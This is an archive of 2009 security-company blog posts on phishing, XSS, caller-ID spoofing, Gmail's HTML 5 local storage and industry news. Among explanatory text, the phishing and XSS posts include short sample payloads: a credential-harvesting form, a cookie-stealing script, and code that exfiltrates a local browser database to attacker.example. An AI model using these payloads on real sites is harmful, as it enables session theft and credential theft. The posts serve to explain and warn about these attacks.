Thursday, April 30, 2009

Phishing - Never Ending Attack

Phishing is the act of tricking someone into providing confidential information such as usernames, passwords, and other sensitive data. It is typically carried out via fraudulent e-mail messages or websites that claim to be legitimate while seeking personally identifiable information. It is not a new attack vector, but it is still widespread on the web. Phishing uses social engineering to lure the victim into entering sensitive information into a fake or malicious website, and the victim ends up losing his or her private information.

It looks like phishing will be a never-ending threat to web security. A number of popular websites are targeted by phishing campaigns designed to steal sensitive information. The example included here involves the very popular social networking site Orkut. Last night, I saw an update from one of my friends on Orkut with headlines such as "New Orkut Version" and "Orkut New Theme", along with some links. Looking at the links, it was clear that they pointed to fake websites used for phishing. Here is the screenshot:

[Screenshot: Orkut status update advertising "New Orkut Version" and "Orkut New Theme" with phishing links]

Browsing those links led to a fake login page that looks very similar to the original Orkut login page. Closer inspection of the domain makes it clear that the phishing page is hosted on a free web hosting site. There are many free web hosting services on the Internet, so it is very easy to register a throwaway domain and host fake pages there. Being a security researcher, I quickly opened the source of the page and found that the login form's action URL had been changed to "run.php" and its method changed to a GET request. Everything else was as I expected it to be.
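
For illustration, the tampering amounts to something like the following (a hedged sketch; the field names and surrounding markup are stand-ins, not the actual Orkut source):

<!-- The original form posted credentials to the real login endpoint; -->
<!-- the phisher points it at run.php and switches the method to GET. -->
<form action="run.php" method="GET">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>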

Then, when I entered a fake username and password, the page sent a GET request containing all of the needed parameters, including a redirect link to the Orkut home page. Here is the Wireshark packet capture of the GET request and the response from the "run.php" page:

[Screenshot: Wireshark capture of the GET request to "run.php" and its response]

Interestingly, if you look at the response from the "run.php" page, you will see that it uses 'document.location.href' to redirect the browser to the original login page, appending all of the parameters needed to log in, including the Email and Password in clear text. This shows that "run.php" builds the redirect script dynamically from the submitted email and password. Don't worry; we entered fake information, so nothing was leaked. Remember, the real Orkut never passes credentials as clear-text URL parameters.
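
As a hedged reconstruction (the login URL and parameter values here are illustrative, not the captured response), the script returned by "run.php" looks something like this:

// Hypothetical reconstruction of the dynamically generated redirect.
// run.php embeds the just-stolen credentials into the real login URL,
// so the victim lands on the legitimate site and is logged straight in.
document.location.href = 'https://www.orkut.com/login'
    + '?Email=victim%40example.com'
    + '&Passwd=notmyrealpassword'
    + '&continue=http%3A%2F%2Fwww.orkut.com%2FHome.aspx';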

The page does not simply steal your information and then dump you at the original login page to re-enter your username and password; it appends all of the necessary parameters to the original login URL. This means that when you enter a correct username and password, you are logged directly into Orkut while also having left your private information on the fake website. Of course, Orkut will still ask for a username and password if you entered fake information, as I had. Here is another screenshot of what the URL looks like:

[Screenshot: the original Orkut login URL with the stolen credentials appended as clear-text parameters]

There are numerous phishing websites on the Internet targeting very popular sites. The fake pages used are very similar to the originals, with only a few changes in the source code. It is very easy to create such pages and host them. All an attacker needs to do is create a fake login page similar to the original one and add some server-side code (e.g., the PHP page discussed above) to capture the private information.

The above discussion is just one example of phishing. The trick used here, redirecting the victim to the original website with the username and password parameters appended, definitely helps hide the fraudulent website, since you end up at the original site. But remember, the request is actually sent from the "run.php" script, leaving your information on the fake website.

You will find many such phishing sites while surfing. It is becoming very easy for script kiddies to host such fake pages because plenty of information on how to conduct the attack, and even ready-made source code, is freely available. Below is a screenshot from one such forum:

[Screenshot: forum post offering ready-made phishing pages for download]

In this forum post, the author has uploaded fake pages for 34 popular websites, including AOL.com, Gmail.com, eBay.com, and many more. The source code even comes with clear instructions on how to use and host these fake pages, which look like exact copies of the original sites. Below are more fake pages created for popular websites, including Yahoo and MySpace:

[Screenshots: fake login pages mimicking Yahoo, MySpace, and other popular sites]

Phishing is a trivially easy way to conduct online identity theft. It can be used to steal not only personal information but financial information as well. It is also very easy to lure large numbers of victims to a phishing website through emails, messages, scraps, etc. Most such emails prompt the victim to visit the provided link and enter private information on the fake website.

You can avoid being phished by following a few recommendations:

  • Check the website address in the address bar of the browser. Most phishing websites are hosted on free web hosting sites.
  • If you find a suspicious website, check the source code of the page, locate the login form, and compare it with the original website's source.
  • Never click on links in email from unknown or untrusted senders. Remember, financial institutions, banks, auction sites, social networking sites, etc. never send email asking users to update or change their information.
  • Be extra careful before entering financial information.
  • Report phishing sites to the legitimate website's team when you encounter them.

That’s it for now.

Umesh

Monday, April 27, 2009

RSA Wrap-Up

Last week brought yet another edition of our industry's mega conference, known as RSA: the see-and-be-seen conference where we all show up to spend far too much money erecting and decorating a booth because we must. It is, however, the single best place to meet the many individuals that we've done business with via telephone and email and finally get to shake their hands. The 2009 edition of RSA clearly illustrated a couple of things for me: the recession is real and the cloud has arrived. Did the former play a role in driving the latter? Quite possibly.

Recession Blues

It was obvious to most that traffic on the expo floor just wasn't what it had been in previous years. I heard rumors that attendance was down 12-13 percent, but agree that it felt like more than that. Not a surprising statistic when even the largest employers continue to announce layoffs and budget cuts. I was also struck by the lack of the 'new, new thing'. I generally spend time walking the expo floor looking for interesting start-ups that I haven't heard of before, ones with an intriguing business model that leave me saying 'I wish I'd thought of that'. They tend to have the smallest booths and are stuck in a back corner, but make up for their lack of marketing muscle with a great new product or service. This year, however, I walked away disappointed. Perhaps I was just too busy to spend adequate time at the expo, but I suspect that we're seeing the effects of the now well-publicized drop in investment capital. While that's bad news for those seeking funding, it's welcome news for those that have managed to secure the cash they require, as they're likely to face less competition.

A Silver Lining?

Heading into the conference, I expected 'cloud security' to be the catch phrase that would rule the day. Looking at the various product launches and flipping through the program guide, it seemed as though everyone wanted to ensure that they were associated with 'the cloud' in some shape or form; a full 23 presentations dealt with cloud security. It was also clear that there's plenty of confusion surrounding what the cloud really is. The term 'cloud security' itself causes confusion, as it is used interchangeably to describe both the security requirements of generic cloud computing initiatives and security services delivered in the cloud. Perhaps companies such as Zscaler should stick with 'Security as a Service' to describe what we do. Fortunately, industry initiatives such as the Cloud Security Alliance (keep reading) are forming to help define this emerging space.

Highlights

I'd like to thank Dave Cullinane (eBay), Arun Singh (Wipro) and John Ryan (IBM) for participating on my panel entitled Silver Lining: Debating the Merits of Cloud Security - A Customer Perspective. All three panelists are to some degree both consumers and producers of cloud security services, so they brought a wealth of knowledge to the table. It's clear that Security as a Service offerings have a great deal to offer, especially during a recession, but the race has only just begun. Customers, while accepting of the tradeoffs inherent in a cloud model, are demanding powerful functionality at a low price point. It's up to us to deliver, and for those that succeed, there is no shortage of demand. Our CEO, Jay Chaudhry, also participated in a great panel on cloud security, which turned out to be standing room only.

On Wednesday, Jim Reavis officially launched the Cloud Security Alliance (CSA), a non-profit organization that is bringing together some of the best and brightest in our industry to help define cloud security. The CSA mission statement is to "promote the use of best practices for providing security assurance within Cloud Computing, and provide education on the uses of Cloud Computing to help secure all other forms of computing". I'm honored to be one of the founding members and to have contributed to the initial content including the Security Guidance for Critical Areas of Focus in Cloud Computing document released at RSA.

And what RSA would be complete without the plethora of parties to wine and dine prospects (or perhaps to just get rid of a little funding). I'm pleased to say that the recession did not seem to dent the enthusiasm of the party organizers. Two of my personal favorites were the WASC Meetup and the Security Blogger Meetup. While the vendor parties are great, nothing beats the chance to share war stories with industry colleagues over a few beers.

'til next year!

- michael

Friday, April 24, 2009

GeoCities: Rest In Peace

Yahoo finally shut off life support for the "should have been dead by now" site GeoCities.com. GeoCities had its noted time in history, providing a free means for all those folks who felt they needed to jump onto the Internet bandwagon and have a personal website to express themselves. In this age of blogs, social networking, and instant messaging, GeoCities is both a technological and sociological relic.

GeoCities has always had some seedy areas, but lately it seems to have mostly served the dark side of the Internet, being a favored platform of spammers, botnets, and malware writers. Sophos mentioned that GeoCities and Blogger require very little identification in order to set up a site...which is why they see a lot of malicious content on those two Internet properties. Sites like malwaredomainlist.com show a fair number of known malware URLs hosted on GeoCities. Google Safe Browsing reports over 700 pieces of malware, worms, and Trojans encountered on GeoCities pages in the last 90 days.

Next on the "do not resuscitate" list is AngelFire.com, owned by Lycos. Google Safe Browsing reports it as having about half the amount of malware as GeoCities. But, to be fair, Google reports that Blogspot.com contains about four times more malicious content than GeoCities and AngelFire combined. So it's all relative. Closing GeoCities will remove some malware breeding grounds from the Internet, but it is only a dent in the grand scheme of things.

But hey, every little bit helps, right?

Until next time,
- Jeff

Friday, April 17, 2009

We Used to Laugh at XSS

I remember at Defcon 10 in 2002, when members of GOBBLES took to the stage for their much anticipated talk about the state of the security industry. The talk turned out to be a largely incoherent, but entertaining rant and I still remember the Unix Terrorist (aka Stephen Watt) poking fun at the many cross-site scripting (XSS) holes that people had begun to publish advisories for. At the time, he was right. XSS wasn't a high risk vulnerability. It wasn't being leveraged by attackers for anything meaningful and could be easily thwarted by simply avoiding the use of JavaScript. Well...things have changed. Today, Watt faces some serious charges due to his alleged involvement in the TJX breach and XSS vulnerabilities have emerged as a legitimate threat.

What changed?

Last weekend, a web-based Twitter worm (aka the Mikeyy/StalkDaily worm) hit the media. It was the work of Michael Mooney, a 17-year-old, self-described 'bored developer', who was brazen enough to brag about the attacks after the fact. He may be regretting the publicity at this point, now that his systems have been publicly hacked and he's no doubt heard how Samy Kamkar was rewarded for a similar attack on MySpace with a felony conviction. Thus far, however, it seems to have landed him a job rather than jail time.

What has happened to turn XSS from amusing interweb trickery into a valuable attack vector? In short, the web has changed, but unfortunately security is lagging behind. In general, I see the following four factors that deserve credit:

1.) Prevention [should be] the best Medicine - We've known about the dangers of XSS for at least a decade now, and yet it remains the most prevalent web application vulnerability out there. Efforts to educate developers have produced limited results, not, in my opinion, because developers don't care, but because the population of web developers is growing at a tremendous pace thanks to point 'n click development environments. We've empowered millions with the tools to develop web applications, but we've also made it far too easy to produce an insecure application.

2.) The Ubiquity of JavaScript - We used to tell users to avoid XSS by avoiding JavaScript. That was a reasonable statement in 2001, but good luck surfing the web today without a JavaScript-enabled browser; you'd be better off using a text-based browser such as lynx. With the advent of AJAX-enabled sites and the demand for increasingly interactive, user-friendly web content, you'd be hard pressed to find a JavaScript-free site that anyone actually uses.

3.) The Power of Social Networking - Web-based worms such as the Twitter worm have one inherent limitation - they live within the ecosystem where they were created. While this would be significant for a seldom-used web application, with social networking sites measuring active users in the hundreds of millions it is hardly a limitation at all.

4.) Sky's the limit - While we tend to think of XSS as a way to steal session credentials (the classic payload is sketched after this list), such attacks are limited only by the creativity of the researchers/attackers who pursue them. Anton Rager developed XSS-Proxy as a means to remotely control XSS attacks. Billy Hoffman turned a browser into a vulnerability scanner via XSS. Jeremiah Grossman demonstrated gaining insight into someone's browser history, and at Black Hat DC this year, I talked about how XSS can be used to conduct client-side SQL injection. The list goes on and on...
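
That classic session-stealing payload is worth a quick sketch (a minimal example; the attacker's collection URL is hypothetical):

// Injected into a vulnerable page via XSS: ships the victim's cookies,
// and with them any session credentials, to a server the attacker controls.
new Image().src = 'http://attacker.example/steal?c=' + encodeURIComponent(document.cookie);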

The Twitter and MySpace worms were largely benign. When traditional worms began spreading, they were largely benign as well, proofs of concept to show that something could be done. Once that hurdle had been overcome, criminals moved in to profit, and I don't expect the outcome to be any different this time around.

We've set the bar far too low for attackers. Well known vulnerabilities such as XSS remain far too prevalent, despite having been around for years. It's encouraging to see Microsoft stepping into the fray by adding XSS prevention to Internet Explorer 8 and I hope that other browser vendors will do the same. While the root cause lies with web app developers, it is clear that focusing on developers alone will not fix the problem. The interconnected nature of the web requires that all players pitch in to reduce risk to end users.

- michael

Public Service Announcement: EFF Coder's Rights Project

I ran across this today and thought it was just too valuable not to mention. The EFF has a "Coder's Rights Project" that includes FAQs and guides related to the legalities of security disclosure, reverse engineering, and ethical hacking/testing for security vulnerabilities. They are absolutely fantastic layman's summations of all the legal nuances (US-centric) that you should be aware of while pursuing any of these legally grey endeavors. The FAQs and guides concisely lay out how various US laws, such as the DMCA, copyright law, and the Computer Fraud and Abuse Act, can come into play during security testing, disclosure, and reverse engineering efforts. The EFF material also provides very good advice on how to reduce and limit your risk.

If you had any doubt, it should be thoroughly dispelled by the time you are finished reading the material on EFF: testing software and web sites for vulnerabilities is NOT a legally granted right. The law does NOT recognize the concept of "ethical" hacking. As such, the true key to ethical hacking is the confidence that the person you are hacking is not going to legally pursue you after your activities. Hack only when you have permission to do so. Without permission, you are putting yourself legally on the hook regardless of your morals and non-malicious intentions.

If you are still steadfast in your desire to perform security tests without explicit permission in a manner that you feel is morally clean, then you need to ensure that you keep all your actions above board and follow through on your non-malicious intentions. If you do find a problem, report it immediately. Taking the time, for example, to dump the entire user database along with passwords and play around with it for a few weeks before you finally disclose the problem is not going to be seen as aligned with clean intentions. Also keep in mind that law enforcement agencies pay close attention to people trying to hide their identities while engaging in these types of activities; using anonymizers and the like is not looked upon favorably, and as such could push your activities toward the 'blackhat' end of the spectrum rather than the 'whitehat' end. If your intentions are good and you have nothing to hide, then don't hide it.

Above all else, if there is any doubt, then just don't do it.

Until next time,
- Jeff

Wednesday, April 15, 2009

Anatomy of a Straight Answer

You're a software developer, going along minding your own business, when some crazy security geek (hopefully a coworker rather than a stranger who just stepped in from the Net) has the nerve to discover that your code is broken. There is, he says, a hole. "How bad is it?" you ask. "That depends," he usually says, and continues with a long treatise covering many hypothetical possibilities (but always veering away from firm opinions). Maybe he asks 20 questions about how your customers deploy your product (most of which you can't answer). Only if he already knows all about the deployment environment and what your customers are doing with the product will he give you a straight answer, and even then it'll probably sound like an answer plus a lecture or disclaimer. What is up with that? Why doesn't anybody seem to be able to give a straight answer about how bad a vulnerability is?

The problem, from the security geek's perspective, is that "it depends" is the straight answer. "How bad is it?" depends on at least two things: expectations and environment.
  • Expectations because, if Alice believes she is using world-wide Internet photo publishing software, and later it turns out that anyone on the Internet can see the snapshots she added to her photo library, she is unlikely to call this a security problem even if said Internet user can use a technique the software developer didn't intend. But if Alice believes she is using software to share photos with her friends over the Internet, and later her prospective employer Googles her and finds pictures from that one party because the photo sharing site has an anonymous FTP server on the same box, she will be quick to cry security hole.
  • Environment because there's nothing wrong with an anonymous FTP server, and nothing wrong with an access-controlled photo sharing site, but put them together in the wrong way, and Alice is out of a job and hopping mad.

Expectations and deployment environment are especially important in evaluating design flaws. It's a design flaw when the system is implemented exactly the way the designer intends, but the design allows unauthorized users to do more than the system owners or legitimate users expect. Given a design and some expectations, how bad the design flaw is (and even whether it exists) is entirely a function of the deployment environment. Likewise, given a design and a deployment environment, the severity of the design flaw (if any) depends entirely on stakeholders' expectations. So, if you ask a security geek how bad a design flaw is, he is going to spend a lot more time looking into stakeholders' expectations and the environment than into the system you asked him to analyze. This may seem weird, but he's looking there because that's where the answers are.

(In the case of an implementation flaw, proportionally more time may be spent figuring out the direct, technical implications of the flaw, mostly because, by the time you've identified the existence of a design flaw, you usually already have a pretty good idea how it affects the system in isolation. After that, the analysis is the same as for a design flaw. Mitigation, on the other hand, is usually easier, since you can fix the bug without changing anything for your legitimate users or relying on protection in the environment.)

-- Brenda

Monday, April 13, 2009

Spoofing caller-ID: the new hacking inroad

It is amazing to see the number of bridged services that rely upon the source telephone address of an incoming call (supplied via caller-ID) or SMS message as a form of authentication. Maybe this made sense in the 90's, when spoofing caller-ID was hard and the most it would yield was access to someone's voicemail without a PIN. But nowadays there are countless online services that allow SMS and caller-ID source spoofing (Spoofcard, Phonytext, etc.). Pair this with the growing number of services offering telephony or SMS integration, and you start to have a problem.

Let's review some recent examples of this situation in action.
Twitter was found to allow spoofed SMS messages to perform Twitter account actions/changes. The core problem was first identified nearly two years ago, but a recent variant allowed attackers to circumvent previously added safeguards. Twitter offers the option of using a PIN, but a PIN impacts the ease of use and the overall user experience, so users do not jump at the opportunity to opt in to this additional hurdle.

Google Voice has also had a fair amount of problems exposed, although some of the problems use different vulnerability vectors than the simple spoofed caller-ID/SMS. Spoofing caller-ID of a mobile phone configured for a Google Voice account allows an attacker to get into the Google Voice IVR system for that account and modify certain settings. Google has since closed these holes.

While we are talking about hacking telephone/SMS-related services, it is probably worth mentioning an XSS bug found on Skype's website. An attacker can try the usual bag of tricks to get a user to click on an XSS-ified link and gain access to the Skype session cookie. Fortunately, it seems Skype session cookies expire after thirty minutes...making the window of exploit opportunity a bit smaller for an attacker.

Overall, it is important for companies looking to add SMS/telephony bridged capabilities to their existing services to understand that caller-ID and SMS source information is not reliable for authentication purposes. Period. It is no different than asking a user for their username without the additional authentication aspect of a password; it creates an "on your honor" system which is ripe for abuse.

Until next time,
- Jeff

Why Are Two Holes Worse Than One?

I'm giving a talk at Metricon next week. One of my more successful pre-talk strategies is to corner whatever non security experts I can find and practice explaining what I am going to talk about. By the time I can successfully explain a concept to my doctor's accountant, a freelance outdoor photographer, and a graphics programmer (this week's semi-randomly selected crew of listeners), I usually have a pretty good idea of which explanations work. Plus, talking to people outside my field is a great way to practice answering unexpected and frequently awkward questions in real-time. Like "why are two security problems worse than one?" "Of course they're worse; there are two of them" is not a satisfying answer. Now that I've had a bit more time to think about the question, I even recall a conversation with another security geek who argued fairly passionately that two similar holes are not worse than one.

For discussion purposes, let's assume the two vulnerabilities are independent (i.e. not caused by the same design problem or line of code), but very similar (e.g. they have identical CVSS vectors), and consider things the second vulnerability might affect:

Discoverability

The second vulnerability will not affect the attack surface (i.e. the area an attacker with no knowledge of the system searches to discover vulnerabilities), but it will affect the number of vulnerabilities an attacker could find. If each hole is found with some independent probability p during a search, the chance of finding at least one of two holes is 1 - (1 - p)^2, which is always greater than p. Therefore, it is more likely that an attacker will find one of the vulnerabilities, and two holes are worse than one.

Mitigation costs

If two vulnerabilities allow access to the same target, from the same starting state, one must mitigate both vulnerabilities to prevent access to this target from this starting state. But if they are independent, they must be mitigated separately. Therefore, it will cost more to prevent access to the target, and two vulnerabilities are worse than one.

Throughput

Depending on the vulnerabilities in question, the second vulnerability may allow more attackers to attack simultaneously than the first one alone. If this were the case, two vulnerabilities would be worse than one. In practice, attackers are not usually trying to fully load the system with attacks, so even if it's theoretically worse, it may not be worse in practice.

Reachability

For reachability purposes, it doesn't matter how many ways the attacker can do it, it only matters whether the attacker can do it. Therefore, two holes with identical CVSS vectors are not worse than one. This makes a lot of sense from the perspective of a goal-oriented attacker with knowledge of the first vulnerability, but less sense from the perspective of a defender.

I may have left out some relevant philosophical issues, but for myself, I'm satisfied enough to continue thinking that two vulnerabilities are worse than one.

-- Brenda

Tuesday, April 7, 2009

Gmail and HTML 5

If you accessed Gmail today on your iPhone or Android-based phone using a web browser, you will have noticed some differences. It has a few more bells and whistles, but of particular interest is the addition of offline access. Gmail went offline a few months ago thanks to Gears (formerly Google Gears). Mobile Safari on the iPhone doesn't, however, have a Gears plugin, so how was this accomplished? The answer lies in the yet-to-be-finalized HTML 5 specification, and specifically the client-side database storage functionality that it calls for. While HTML 5 remains a work in progress, WebKit-based browsers such as Safari and Mobile Safari have already adopted database storage. This permits developers to create, and subsequently read from and write to, a fully capable, locally stored relational database accessed via the web browser. I view today's Gmail release as a watershed moment for offline web applications, as this is the first mainstream web application that I've seen using the technology.
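
To give a feel for the API, here is a minimal sketch of the client-side database calls as WebKit exposes them; the database name and schema below are made up for demonstration, not anything Gmail actually uses:

// Open (or create) a local database: name, version, display name, size hint.
var db = openDatabase('demo', '1.0', 'Demo store', 2 * 1024 * 1024);

// Create a table and store a row, entirely within the browser.
db.transaction(function (tx) {
  tx.executeSql('CREATE TABLE IF NOT EXISTS notes (id INTEGER PRIMARY KEY, body TEXT)');
  tx.executeSql('INSERT INTO notes (body) VALUES (?)', ['hello, offline world']);
});

// Read it back later, even with no network connection.
db.readTransaction(function (tx) {
  tx.executeSql('SELECT body FROM notes', [], function (tx, results) {
    for (var i = 0; i < results.rows.length; i++) {
      console.log(results.rows.item(i).body);
    }
  });
});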

I view offline access as an inevitable next step for web applications. We have continued to blur the line between desktop applications and their web-based counterparts. Technologies such as AJAX, Flash, Silverlight, etc. have continued to push the limits of what browser-based applications are capable of, but despite all of the added functionality, web apps suffer from one inherent limitation - they disappear when you go off the grid. Well, that's about to change.

Local Gmail Storage

Since the (un-jailbroken) iPhone doesn't permit raw file access, I'll walk through Gmail's use of HTML 5 via Safari on a standard OS X platform. First off, in order to get Google to deliver the HTML 5 version of Gmail, we'll change the User-Agent header to match the one used by the iPhone (in Safari, this can be done via the Develop > User Agent menu) as follows:

Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20

Now when we visit Gmail, the iPhone version of the app is displayed. At this point, local database storage has automagically been set up. One concern that I have here is that the end user is not informed of this. Gears at least requires the end user to acknowledge that a local copy of data is being set up. While I'm not a fan of leaving security decisions in the hands of the average end user, I do feel that users should be informed that they're now carrying around a local copy of their email, which could be accessible if their phone were ever lost.

Now let's see exactly what has been stored locally. On OS X, the database is set up in the following location:

/Users/[username]/Library/Safari/Databases/http_mail.google.com_0/000000000000000x.db

Separate databases are established for each Gmail account accessed, with each receiving an incremented numerical value. The database uses the SQLite format, so its content can be viewed with an application such as the SQLite Database Browser, or from the command line, as sketched after the list below. Here are the tables that are created, along with a description of the data each contains:
  • action_queue - Purpose unclear
  • cached_contacts - Top 20 contacts, including email addresses and names
  • cached_conversation_headers - Abbreviated content from email messages including the full subject, sender's name and first sentence or two of the message
  • cached_labels - User defined labels which can be assigned to email messages
  • cached_messages - Similar to cached_conversation_headers
  • cached_queries - Purpose unclear
  • config_table - Application version number
  • hit_to_data - Purpose unclear
  • log_store - Purpose unclear
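
Since it's a standard SQLite file, you can also poke at it from a terminal. An illustrative session (the exact file name varies by account):

sqlite3 000000000000000x.db
sqlite> .tables
sqlite> SELECT * FROM cached_contacts;
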
Security Concerns

I've commented in the past that Gears and HTML 5 represent fantastic technologies, but as with most new technologies, when poorly implemented they can lead to increased security risk. Applications communicate with local data storage via JavaScript calls. The calls are restricted by a same-origin policy to ensure that only the application which created the data can subsequently access it. However, as I demonstrated at Black Hat DC this year, when sites are affected by XSS vulnerabilities, a remote attacker could gain access to local database storage and perform client-side SQL injection attacks. Now, fortunately, I have no reason to believe that Gmail currently suffers from any XSS vulnerabilities, but it certainly has numerous times in the past. What I'm more concerned about is the fact that XSS remains an all too common vulnerability, and as other developers adopt local database storage via Gears or HTML 5, we are sure to see plenty of vulnerable sites, which will place end users at risk. This isn't just a privacy concern; it's also a data integrity issue, as an attacker can write to the database just as easily as they can read from it.
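
To make the risk concrete, here is a hedged sketch of both problems. The database and table names are hypothetical; injected script would have to match whatever the vulnerable application actually created:

// Script injected via XSS runs in the application's origin, so the
// same-origin policy no longer protects the local database.
var db = openDatabase('app_db', '1.0', 'app', 5 * 1024 * 1024);

db.transaction(function (tx) {
  // Read: quietly exfiltrate locally cached data to the attacker.
  tx.executeSql('SELECT * FROM cached_messages', [], function (tx, results) {
    for (var i = 0; i < results.rows.length; i++) {
      new Image().src = 'http://attacker.example/log?d='
          + encodeURIComponent(JSON.stringify(results.rows.item(i)));
    }
  });
  // Write: tamper with cached data just as easily (the integrity issue).
  tx.executeSql('UPDATE cached_messages SET subject = ? WHERE id = 1', ['tampered']);
});

// Separately, application code that concatenates input into its queries
// invites classic SQL injection on the client side:
//   tx.executeSql("SELECT * FROM notes WHERE tag = '" + userInput + "'");
// Parameterized queries ('... WHERE tag = ?', [userInput]) avoid this.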

Overall, I feel that the HTML 5 specification has a great deal to offer and it's encouraging to see some early adoption. It will be up to developers to ensure that powerful features such as local database storage do not unnecessarily expose end users to increased risk.

- michael

Friday, April 3, 2009

Re-blogging headlines – March/April

It felt like a whole day was lost to April 1st, the day many Internetizens convince themselves they will be unique in fabricating a ruse to demonstrate their cleverness. The Internet already has a low signal-to-noise ratio; on April 1st, the few valuable sites that exist seem to actively collude to drive the ratio even lower. One has to wonder how many man-hours were spent on CADIE, the panda-loving artificial life form, and on facial gestures for web browsers. At least Mr. Astley continued to receive free marketing through the many gimmicks.

Anyways, it seems the world survived the Conficker worm. Many media outlets painted April 1st as nothing less than the end of the online world. Perhaps it was the biggest April Fool's joke of all time: getting so many agencies to earnestly report on something that didn't happen. And while it sounds like the makings of another April 1st prank, the "Conficker eye chart" is actually a real tool. Apparently Conficker blocks access to certain security vendor sites, and the eye chart makes that readily apparent when your browser tries to fetch graphics from said sites. Quite clever.

There have been a lot of cloud-centric headlines recently. The Cloud Security Alliance was launched, with Zscaler as an active participant. There is a LinkedIn group available for general discussion, but it seems things will really start moving around the time of the RSA Conference. The Open Cloud Manifesto group (with a LinkedIn group as well) also launched recently. They are trying to promote open standards for cloud vendors. On the one hand, this is a great plan, as most cloud technology is home-grown; current implementations are often proprietary systems and thus have very little opportunity for interoperability with other clouds. On the other hand, the pioneering cloud vendors currently derive a large market advantage simply from having tackled the architecture and implementation hurdles that others must surmount to compete. So I don't predict a lot of vendors willingly jumping onto the openness bandwagon until cloud platforms become ubiquitous and commonly obtainable...meaning the market advantage of merely possessing the technology is minimized or removed entirely and commoditization sets in. And despite all this recent excitement over clouds, I feel I need to give an honorary mention to Craig Balding over at www.cloudsecurity.org, who has been talking about cloud security for quite a while now. It's nice of us to finally start catching up with him.

I've blogged relatively recently about Google, Gmail, beta status, and their cloud technology (in my posts "Changing a tire while going 60mph" and "Big, white, puffy clouds can still evaporate"). There were some recent articles that address some of the points I raised. First was the Ars Technica interview with Gmail product manager Todd Jackson, who addressed the whole Gmail 'beta' moniker despite Gmail celebrating its fifth anniversary. Then Google unveiled some details of their hardware designs, which include using localized batteries in the server chassis instead of external UPS battery backups. Apparently internal batteries can achieve better efficiency than a UPS can offer; also interesting was their 12-volt-only power supply. But there were two much broader takeaways from that story that appealed to me. First was the notion that Google's investments in platform innovations, even those producing only minute improvements, can still realize a quick return due to the sheer mass of Google's infrastructure. That's a very unique position to be in, because Google can derive advantage from micro-improvements for which other corporations simply do not have the economy of scale to realize a return. Second was the statement that Google is currently obtaining efficiency levels that the EPA hopes will be commonly achievable in 2011, after additional "advanced technology" becomes available to help realize that goal. That is a pretty big tip of the hat to Google and their level of innovation; apparently they are at least two years ahead of where everyone else hopes to wind up down the road. Maybe we should ask them what their lottery number choices are...

Until next time,
- Jeff